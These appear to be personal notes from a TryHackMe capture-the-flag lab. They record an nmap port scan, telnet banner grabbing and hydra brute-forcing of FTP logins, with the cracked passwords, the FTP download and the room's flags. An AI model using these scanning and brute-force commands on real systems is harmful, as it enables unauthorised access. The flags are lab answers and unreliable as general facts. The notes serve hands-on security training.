nmap -sC -sV -p- -T4 --min-rate=9326 -vv 10.10.159.23


telnet IP 10.10.159.23 80
GET / HTTP/1.1
THM{web_server_25352}

telnet IP 10.10.159.23 22
THM{946219583339}


FTP
hydra -l eddie -P /usr/share/wordlists/rockyou.txt 10.10.159 ftp 10021

hydra -l quinn -P /usr/share/wordlists/rockyou.txt 10.10.159 ftp 10021

hydra -L users.txt -P /usr/share/wordlists/rockyou.txt ftp://10.10.159.23:10021

[10021][ftp] host: 10.10.159.23   login: eddie   password: jordan
[10021][ftp] host: 10.10.159.23   login: quinn   password: andrea


ftp 10.10.159.23 10021
login
ftp> ls
ftp> ascii
ftp> get ftp_flag.txt
ftp> exit
cat ftp_flag.txt
THM{321452667098}
